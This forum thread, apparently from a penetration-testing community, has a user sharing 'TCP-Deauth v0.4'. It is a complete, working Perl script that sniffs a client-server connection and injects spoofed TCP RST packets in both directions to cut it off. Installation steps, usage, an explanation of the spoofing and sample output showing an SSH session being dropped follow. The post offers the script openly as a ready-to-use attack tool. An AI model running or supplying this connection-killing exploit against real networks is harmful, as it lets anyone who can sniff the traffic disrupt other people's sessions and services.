Results 1 to 7 of 7

Thread: TCP-Deauth v0.4

Threaded View

  1. #1
    Just burned his ISO
    Join Date
    May 2010
    Posts
    4

    Default TCP-Deauth v0.4

    Hi. I write this small Perl script during my researh on the TCP/IP protocol. It disconnect a host from a server, all is in the usage.

    Code:
    #!/usr/bin/perl
    
    use Net::RawIP;
    
    print "[TCP-Deauth v0.4] Exploit by azert0x\n"."=" x 36 ."\n"; ($eth, $cip, $sip, $sport) = @ARGV;
    die "Usage: ./$0 [interface] [client ip] [server ip] [server port]\n" if @ARGV < 3;
    $n = Net::RawIP->new; print "Waiting for specified network traffic...\n";
    $p = $n->pcapinit($eth, "tcp and src host $sip and dst host $cip and dst port $sport", 1500, 30);
    loop($p, 1, \&tcprst, 0); print "> TCP-Deauth Exploit Done :)\n";
    
    sub tcprst {
      $n->bset(substr $_[2], 14); my ($cport, $ack_seq, $seq) = $n->get({tcp => [qw(source ack_seq seq)]});
      $n->set({ip => {saddr => $cip, daddr => $sip}, tcp => {source => $cport, dest => $sport, ack_seq => $ack_seq, seq => $seq, rst => 1}});
      print "Sending Spoofed RST to $sip:$sport with Acknum $ack_seq and Seqnum $seq\n"; $n->send;
      $n->set({ip => {saddr => $sip, daddr => $cip}, tcp => {source => $sport, dest => $cport, ack_seq => $ack_seq, seq => $seq, rst => 1}});
      print "Sending Spoofed RST to $cip:$cport with Acknum $ack_seq and Seqnum $seq\n"; $n->send;
    }
    
    # azert0x first sploit.
    # Thanks to Perl Underground!
    ----------------------------------

    On BackTrack4 the CPAN Perl module Net::RawIP do a segfault, so:

    $ sudo perl -MCPAN -e "install Net::RawIP"


    and after compilation and (re)installation it works great. Then, run the script as it and you'll see the usage.

    $ sudo perl deauth.pl

    My script spy the specified client and server network traffic, get the values of ack_seq & seq flags and send to the server, with them, a network packet with the RST flags activate (this RST packet masquerade as the client). If the connection is in ETABLISHED state, my script re-send another RST packet to the client (this RST packet masquerade as the server).

    You must obviously be able to sniff the traffic between the targets for my tool works (you should have understood from reading above).

    It works in various network environments, not only in localhost!
    But if you work in localhost (127.0.0.1), specify "lo" as network interface.

    For example: i've a localhost SSH server and i'm connected to it. I run my Perl script, it waits for network traffic. When i press a key on my SSH shell, i'm disconnected.

    azert0x@bt4:~$ sudo perl deauth.pl lo 127.0.0.1 127.0.0.1 22
    [TCP-Deauth v0.4] Exploit by azert0x
    ============================
    Waiting for specified network traffic...
    Sending Spoofed RST to 127.0.0.1:22 with Acknum -131693645 and Seqnum -123819417...
    Sending Spoofed RST to 127.0.0.1:60295 with Acknum -131693645 and Seqnum -123819417...
    > TCP-Deauth Exploit Done :)

    I'll update it soon, so please, if you have any problems, bugs or ideas about it, tell them to me. Then gladly i'll work on improvement.
    Last edited by azert0x; 10-15-2010 at 02:29 PM.

Similar Threads

  1. BT3 and RT73 Deauth ?
    By Halla18x in forum OLD Newbie Area
    Replies: 12
    Last Post: 11-27-2008, 07:05 PM
  2. How to deauth a client?
    By rajend3 in forum OLD Newbie Area
    Replies: 2
    Last Post: 10-05-2008, 08:40 PM
  3. help with Kismet and -deauth
    By xaser in forum OLD Newbie Area
    Replies: 6
    Last Post: 05-21-2008, 05:21 AM
  4. WEP/WPA Deauth issues
    By samsung in forum OLD BT3beta General
    Replies: 1
    Last Post: 02-09-2008, 04:17 PM
  5. Who do you DeAuth?
    By Spyder_Snyper in forum OLD Newbie Area
    Replies: 5
    Last Post: 05-13-2007, 11:10 PM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •